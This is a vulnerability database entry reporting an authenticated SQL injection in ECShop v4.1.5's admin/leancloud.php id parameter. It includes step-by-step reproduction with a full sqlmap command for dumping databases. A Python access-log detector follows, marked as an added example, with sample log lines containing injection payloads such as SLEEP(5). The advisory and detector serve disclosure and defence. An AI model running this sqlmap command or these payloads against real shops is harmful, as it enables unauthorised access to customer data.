| Title | EcShop v4.1.5 SQL injection |
|---|
| Description | A vulnerability was discovered in Ecshop v4.1.5. After logging in to the system, the parameter id exists in leancloud.php, and the parameter id is not filtered normally, resulting in SQL injection. An attacker can exploit this vulnerability to obtain data.
1. First log in to the backend, then visit the page below and use Burp to capture the packet and obtain the corresponding cookie.
/ECShop_V4.1.5/source/ecshop/admin/leancloud.php?id=123
Note: The cookie must be the following key-value pair. If one item is missing, it means that the correct package is not captured or it must be reconfigured.
2. Use sqlmap for injection testing, paying attention to replace the number in --cookie with the actual cookie, and finally obtain the data successfully.
sqlmap -u "http://172.16.214.182/ECShop_V4.1.5/source/ecshop/admin/leancloud.php?id=123" --data "act=resend" -p "id" --skip "act,cookie,user-agent,referer,host" --risk 3 --level 5 --dbms mysql --cookie "loginNum=1; ECS_LastCheckOrder=Thu%2C%2028%20Apr%202022%2013%3A16%3A49%20GMT; PHPSESSID=ebtmgof8q3bto0ai088fsvl4bh; ECS_ID=18d636b4644873c4fdb46cf3c4c2b135a912706e; ECS[visit_times]=1; ECSCP_ID=378bf619d7c9c9df588c937be89e20acd56e0821; Hm_lvt_154183a478f900f0163b2141ac4416a5=1651151808; Hm_lpvt_154183a478f900f0163b2141ac4416a5=1651151808" --dbs --flush-session --batch --random-agent |
|---|
| Source | ⚠️ https://github.com/xhcccan/code/issues/1 |
|---|
| User | xhccan (UID 52599) |
|---|
| Submission | 2023. 09. 24. PM 12:14 (3 years ago) |
|---|
| Moderation | 2023. 09. 29. PM 04:19 (5 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 240924 [ECshop 4.1.5 /admin/leancloud.php id SQL injection] |
|---|
| Points | 20 |
|---|
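
A log check for the endpoint and parameter named in the report above, as an added example that is not part of the original submission or of ECShop: it flags requests to admin/leancloud.php whose id is not a plain integer. The combined access-log format, the `suspicious_requests` name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request part of a combined-format access log entry (the log format is an assumption).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
ENDPOINT = "/admin/leancloud.php"  # path from the report above
PARAM = "id"                       # parameter from the report above


def suspicious_requests(lines):
    """Return (ip, decoded id) for hits on the endpoint whose id is not a plain integer."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        url = urlsplit(m.group("target"))
        if not url.path.endswith(ENDPOINT):
            continue
        # parse_qs percent-decodes values; keep_blank_values so "id=" is still inspected.
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if not re.fullmatch(r"\d{1,10}", value):
                hits.append((m.group("ip"), value))
    return hits


# Constructed sample log lines (not taken from the report).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Apr/2022:13:17:01 +0000] "POST /ECShop_V4.1.5/source/ecshop/admin/leancloud.php?id=123 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [28/Apr/2022:13:18:40 +0000] "POST /ECShop_V4.1.5/source/ecshop/admin/leancloud.php?id=123%27%20AND%201%3D1--%20- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [28/Apr/2022:13:18:41 +0000] "POST /ECShop_V4.1.5/source/ecshop/admin/leancloud.php?id=123%20AND%20SLEEP%285%29 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [28/Apr/2022:13:19:02 +0000] "GET /ECShop_V4.1.5/source/ecshop/admin/index.php?id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} sent non-numeric id to {ENDPOINT}: {value!r}")
```

The check only sees id when it travels in the URL, as it does in the reported request; an id sent in a POST body does not appear in a standard access log.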